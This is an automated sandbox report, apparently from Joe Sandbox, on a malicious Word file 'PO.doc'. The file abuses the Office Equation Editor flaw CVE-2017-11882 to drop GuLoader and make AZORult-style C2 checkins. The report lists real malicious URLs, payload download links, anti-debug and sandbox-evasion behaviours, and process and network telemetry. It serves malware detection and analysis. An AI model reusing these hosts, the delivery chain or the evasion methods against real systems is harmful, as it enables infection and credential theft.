Analysis Report PO.doc

Overview

General Information

Sample Name: PO.doc
Analysis ID: 288935
MD5: 0130fdb3041f8fdc413da2de12a20c9c
SHA1: b711ff1e41c069af0d1358a7ca4398759a9830b0
SHA256: ee2c879433d8277e88d27b223e45f73517ab30aa6636468633a98c85172a34b3
Tags: doc

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected VB6 Downloader Generic
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2440 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2288 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • kodjfhfj.exe (PID: 2520 cmdline: C:\Users\user\AppData\Roaming\kodjfhfj.exe MD5: ED5C029E13A88CD8A2ECD9F48B9A83B7)
      • kodjfhfj.exe (PID: 2484 cmdline: C:\Users\user\AppData\Roaming\kodjfhfj.exe MD5: ED5C029E13A88CD8A2ECD9F48B9A83B7)
  • EQNEDT32.EXE (PID: 3052 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.2093759643.00000000001B0000.00000040.00000001.sdmp | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
Process Memory Space: kodjfhfj.exe PID: 2484 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security |
Process Memory Space: kodjfhfj.exe PID: 2484 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: C:\Users\user\AppData\Roaming\kodjfhfj.exe, CommandLine: C:\Users\user\AppData\Roaming\kodjfhfj.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\kodjfhfj.exe, NewProcessName: C:\Users\user\AppData\Roaming\kodjfhfj.exe, OriginalFileName: C:\Users\user\AppData\Roaming\kodjfhfj.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2288, ProcessCommandLine: C:\Users\user\AppData\Roaming\kodjfhfj.exe, ProcessId: 2520
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2288, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\angelwe[1].exe

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: hotelavlokan.com | Virustotal: Detection: 10%
Source: http://hotelavlokan.com/angel/PL341/index.php | Virustotal: Detection: 6%
Source: Http://hotelavlokan.com/ | Virustotal: Detection: 10%
Multi AV Scanner detection for submitted file
Source: PO.doc | Virustotal: Detection: 44%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\kodjfhfj.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: global traffic | DNS query: name: www.uttaranchaltoday.com
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 104.28.1.185:443
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 104.28.1.185:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2029405 ET TROJAN Win32/AZORult V3.3 Client Checkin M2 192.168.2.22:49170 -> 104.28.24.76:80
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic | HTTP traffic detected: POST /angel/PL341/index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: hotelavlokan.com | Content-Length: 109 | Cache-Control: no-cache | Data Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 35 70 9d 34 70 9d 30 13 8b 30 65 8b 30 62 8b 30 66 8b 30 6d 8b 31 11 8b 30 63 e8 26 66 9b 26 66 97 26 66 9d 26 66 9d 26 66 9e 40 | Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp5p4p00e0b0f0m10c&f&f&f&f&f@
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B03F1CD-537D-406E-B057-1B1541B1D39D}.tmp
Source: kodjfhfj.exe, 00000005.00000002.2093897184.0000000000867000.00000004.00000020.sdmp | String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: kodjfhfj.exe, 00000004.00000002.2083375873.0000000003080000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: kodjfhfj.exe, 00000005.00000002.2093897184.0000000000867000.00000004.00000020.sdmp | String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: www.uttaranchaltoday.com
Source: unknown | HTTP traffic detected: POST /angel/PL341/index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: hotelavlokan.com | Content-Length: 109 | Cache-Control: no-cache | Data Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 35 70 9d 34 70 9d 30 13 8b 30 65 8b 30 62 8b 30 66 8b 30 6d 8b 31 11 8b 30 63 e8 26 66 9b 26 66 97 26 66 9d 26 66 9d 26 66 9e 40 | Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp5p4p00e0b0f0m10c&f&f&f&f&f@
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: Http://hotelavlokan.com/
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: http://crl.micro
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: http://crl.microt%20IT%20TLS%20CA%202.crl0M
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: kodjfhfj.exe, 00000005.00000003.2093667053.000000001E850000.00000004.00000001.sdmp | String found in binary or memory: http://hotelavlokan.com/angel/PL341/index.php
Source: kodjfhfj.exe, 00000005.00000003.2093667053.000000001E850000.00000004.00000001.sdmp | String found in binary or memory: http://hotelavlokan.com/angel/PL341/index.phpA
Source: kodjfhfj.exe, 00000004.00000002.2083375873.0000000003080000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: kodjfhfj.exe, 00000004.00000002.2083375873.0000000003080000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: kodjfhfj.exe, 00000004.00000002.2084645379.0000000003267000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: kodjfhfj.exe, 00000004.00000002.2084645379.0000000003267000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: kodjfhfj.exe, 00000005.00000002.2093860305.0000000000804000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: kodjfhfj.exe, 00000004.00000002.2084645379.0000000003267000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: kodjfhfj.exe, 00000004.00000002.2084645379.0000000003267000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: kodjfhfj.exe, 00000004.00000002.2083375873.0000000003080000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: kodjfhfj.exe, 00000004.00000002.2084645379.0000000003267000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: kodjfhfj.exe, 00000004.00000002.2083375873.0000000003080000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: kodjfhfj.exe, 00000004.00000002.2083375873.0000000003080000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: kodjfhfj.exe, 00000005.00000002.2093910894.000000000087F000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/-
Source: kodjfhfj.exe, 00000005.00000002.2093910894.000000000087F000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/5
Source: kodjfhfj.exe, 00000005.00000002.2093910894.000000000087F000.00000004.00000020.sdmp, kodjfhfj.exe, 00000005.00000002.2093759643.00000000001B0000.00000040.00000001.sdmp | String found in binary or memory: https://onedrive.live.com/download?cid=4C3F5C65A99DA195&resid=4C3F5C65A99DA195%21189&authkey=AGDK6_h
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: https://vim0zq.bl.files.1drv.com/
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: https://vim0zq.bl.files.1drv.com/y4mysrbfw_ApiJD7XjQfDWlcPiiz8iQWXtIpVT4-Cu4lX83RiR3ViXgwmHFKYGpWT-y
Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\angelwe[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\kodjfhfj.exe
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 5_2_001B0212 EnumWindows,NtSetInformationThread,CloseServiceHandle
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 5_2_001B3772 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 5_2_001B129A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 5_2_001B3ABF NtSetInformationThread
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 5_2_001B1AF8 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 5_2_001B3B1A NtSetInformationThread
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 5_2_001B2C18 NtSetInformationThread,CloseServiceHandle
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 5_2_001B1254 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 5_2_001B2B6E NtSetInformationThread,CloseServiceHandle
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 5_2_001B028A NtSetInformationThread,CloseServiceHandle
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 5_2_001B3B87 NtSetInformationThread
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 5_2_001B05B5 NtProtectVirtualMemory,LoadLibraryA
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 5_2_001B12D4 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 5_2_001B3AC9 NtSetInformationThread
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 5_2_001B1AFE NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 5_2_001B3BED NtSetInformationThread
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 4_2_00405258
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 4_2_00405274
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 4_2_00405216
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 4_2_0040522E
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 4_2_0040529A
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 4_2_00405172
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 4_2_00402932
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 4_2_004051EA
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 5_2_001B2B6E
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\angelwe[1].exe E74606C2BCF3B9A00E932DC4D2D68E9F8E12A9EBA9AB32167491484F97B9E15F
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\kodjfhfj.exe E74606C2BCF3B9A00E932DC4D2D68E9F8E12A9EBA9AB32167491484F97B9E15F
Source: angelwe[1].exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kodjfhfj.exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kodjfhfj.exe, 00000004.00000002.2083375873.0000000003080000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.troj.expl.evad.winDOC@7/11@4/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$PO.doc
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Mutant created: \Sessions\1\BaseNamedObjects\A8AD17B7C-343A2EC6-C0602CB5-673F0738-6F59330C
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRB8D3.tmp
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: PO.doc | Virustotal: Detection: 44%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown | Process created: C:\Users\user\AppData\Roaming\kodjfhfj.exe C:\Users\user\AppData\Roaming\kodjfhfj.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\kodjfhfj.exe C:\Users\user\AppData\Roaming\kodjfhfj.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\kodjfhfj.exe C:\Users\user\AppData\Roaming\kodjfhfj.exe
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Process created: C:\Users\user\AppData\Roaming\kodjfhfj.exe C:\Users\user\AppData\Roaming\kodjfhfj.exe
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: PO.doc | Static file information: File size 1118843 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

Yara detected GuLoader
Source: Yara match | File source: 00000005.00000002.2093759643.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: kodjfhfj.exe PID: 2484, type: MEMORY
Yara detected VB6 Downloader Generic
Source: Yara match | File source: Process Memory Space: kodjfhfj.exe PID: 2484, type: MEMORY
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 5_2_001B2C89 pushfd ; retf 5_2_001B2C96
Source: C:\Users\user\AppData\Roaming\kodjfhfj.exe | Code function: 5_2_001B26F7 push esp; iretd 5_2_001B26F8
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\angelwe[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\kodjfhfj.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (29 identical entries)